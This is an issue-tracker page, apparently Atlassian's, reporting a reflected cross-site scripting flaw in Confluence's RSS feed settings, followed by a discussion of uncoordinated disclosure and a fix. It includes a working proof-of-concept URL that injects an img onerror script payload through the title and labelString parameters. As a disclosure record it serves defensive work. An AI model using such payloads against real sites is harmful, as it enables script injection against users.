Details

    • Last commented by user?:
      true
    • CVSS Score:
      7.5

      Description

      Filed by Vitaly Osipov [Atlassian] on behalf of Muhammad Waqar.

      
      http://$hostname/dashboard/doconfigurerssfeed.action?types=page&pageSubTypes=comment&pageSubTypes=attachment&types=blogpost&blogpostSubTypes=comment&blogpostSubTypes=attachment&types=mail&spaces=conf_all&title=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&labelString=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&excludedSpaceKeys=&sort=modified&maxResults=11&timeSpan=5&showContent=true&showDiff=true&confirm=Create+RSS+Feed
      
      

      Works in Firefox.
      note title and labelstring parameters need encoding.

        Issue Links

          Activity

          Hide
          Vitaly Osipov [Atlassian] added a comment -
          Show
          Vitaly Osipov [Atlassian] added a comment - Note: Muhammad Waqar published this advisory without coordinating with us http://packetstormsecurity.com/files/122717/Atlassian-Confluence-5.3-Cross-Site-Scripting.html
          Hide
          Muhammad Waqar added a comment -

          this is because i received notification that bug has been fixed.

          Show
          Muhammad Waqar added a comment - this is because i received notification that bug has been fixed.
          Hide
          Vitaly Osipov [Atlassian] added a comment -

          Muhammad Waqar From where did you receive this notification? This issue is still open as you can see.

          Show
          Vitaly Osipov [Atlassian] added a comment - Muhammad Waqar From where did you receive this notification? This issue is still open as you can see.
          Hide
          Muhammad Waqar added a comment -

          yes i can see i had received it via email same as like other notifications are arriving.

          Show
          Muhammad Waqar added a comment - yes i can see i had received it via email same as like other notifications are arriving.
          Hide
          Vitaly Osipov [Atlassian] added a comment -

          Muhammad Waqar, This is interesting - according the history tab the state of this issue has never changed to resolved: https://jira.atlassian.com/browse/CONF-30240?page=com.atlassian.streams.streams-jira-plugin:activity-stream-issue-tab

          Regardless of that, do you think that publishing an advisory without any coordination with the vendor is a good disclosure policy?

          Show
          Vitaly Osipov [Atlassian] added a comment - Muhammad Waqar , This is interesting - according the history tab the state of this issue has never changed to resolved: https://jira.atlassian.com/browse/CONF-30240?page=com.atlassian.streams.streams-jira-plugin:activity-stream-issue-tab Regardless of that, do you think that publishing an advisory without any coordination with the vendor is a good disclosure policy?
          Hide
          Muhammad Waqar added a comment -

          Greetings Osipov,
          At First Look I thought issue might be fixed and so resulted in disclosure. Realized now that it might be tested then.
          I will make sure that this won't happen again. Sorry for the Inconvenience.
          Have a good day!
          Regards,
          Muhammad Waqar

          Show
          Muhammad Waqar added a comment - Greetings Osipov, At First Look I thought issue might be fixed and so resulted in disclosure. Realized now that it might be tested then. I will make sure that this won't happen again. Sorry for the Inconvenience. Have a good day! Regards, Muhammad Waqar
          Hide
          David Black [Atlassian] added a comment -

          I have QA'ed remotes/origin/confluence-project-5.2-stable as being fixed.

          Show
          David Black [Atlassian] added a comment - I have QA'ed remotes/origin/confluence-project-5.2-stable as being fixed.

            People

            • Votes:
              0 Vote for this issue
              Watchers:
              7 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved:
                Last commented:
                35 weeks, 2 days ago